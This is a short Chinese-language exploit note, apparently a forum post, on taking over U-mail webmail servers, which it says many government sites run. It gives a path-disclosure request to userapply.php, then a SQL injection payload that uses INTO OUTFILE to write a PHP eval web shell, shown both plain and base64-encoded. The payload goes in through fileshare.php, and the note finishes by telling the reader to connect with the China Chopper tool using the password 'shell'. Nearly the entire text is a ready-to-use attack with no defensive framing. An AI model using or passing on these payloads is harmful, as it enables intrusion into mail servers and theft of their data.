大部分网站政府网站U-mail存在直接拿shell漏洞加入webmail/userapply.php?execadd=333&DomainID=111直接爆出物理地址
然后将 aa' union select 1,2,3,4,5,6,'<?php eval($_POST1);?>',8,9,10,11,12,13,14 into outfile 'D:/umail/WorldClient/html/saknc.php'#用base64编译一下YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1QxKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0ZmlsZSAnRDovdW1haWwvV29ybGRDbGllbnQvaHRtbC9zYWtuYy5waHAnIw==然后 http://127.0.0.1/webmail/fileshare.php?file=加上上面编译的base64代码可直接写入shell saknc.php用菜刀连接 http://127.0.0.1/webmail/saknc.php 密码:shell